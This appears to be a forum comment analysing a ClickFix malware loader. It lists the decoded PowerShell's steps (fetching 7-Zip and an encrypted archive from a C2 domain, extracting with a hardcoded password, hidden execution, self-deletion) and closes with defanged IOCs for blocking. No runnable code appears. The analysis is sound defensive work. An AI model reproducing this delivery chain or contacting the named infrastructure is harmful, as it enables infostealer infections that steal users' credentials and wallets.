It's a multi-stage malware loader. The decoded PowerShell does this:
Forces TLS 1.2 and creates a randomly-named folder in %TEMP%. Downloads a copy of 7z.exe (the legitimate 7-Zip binary) from httXXXps://mstclaudens.beer/api/7z.exe — it brings its own archiver so it doesn't depend on one being installed. Downloads a password-protected archive from httpXXXs://mstclaudens.beer/api/index.php?a=dl&dg=EP7IutuFPF8R1&... — the URL carries a campaign/victim tracking ID and a hash, so the operator knows which lure you came from. It retries up to 3 times. Extracts the archive using 7-Zip with the hardcoded password rEEiT. The password is the whole point — it lets the payload sail past most network/email AV scanning, because scanners can't peek inside an encrypted zip. Hunts the extracted contents for an .exe or .msi and runs it with a hidden window (-WindowStyle Hidden). Deletes the downloaded files to clean up its tracks, and re-launches the whole thing in a hidden PowerShell process.
The actual malicious payload isn't in the script — it lives in that remote archive, which I can't and won't fetch. But the delivery pattern (fake CAPTCHA → "paste in terminal" → loader → encrypted second stage → silent execution) is the textbook ClickFix chain, and the end payload in these campaigns is almost always an infostealer (Lumma, StealC, Vidar, and friends) — something that grabs browser passwords, cookies, session tokens, and crypto wallets and ships them off. The Start-Process … -WindowStyle Hidden and self-cleanup are there so you'd never see it happen. IOCs worth recording / blocking:
Domain: mstclaudens.beer (note the cute "claudens" — these .beer / random-word TLDs are common for throwaway C2) URLs: hxxps://mstclaudens[.]beer/api/7z.exe and hxxps://mstclaudens[.]beer/api/index.php?a=dl&... Archive password: rEEiT Behavior: PowerShell spawning a child PowerShell with -NoProfile -WindowStyle Hidden -Command, writing random .exe/.zip names to %TEMP%
tronium•28m ago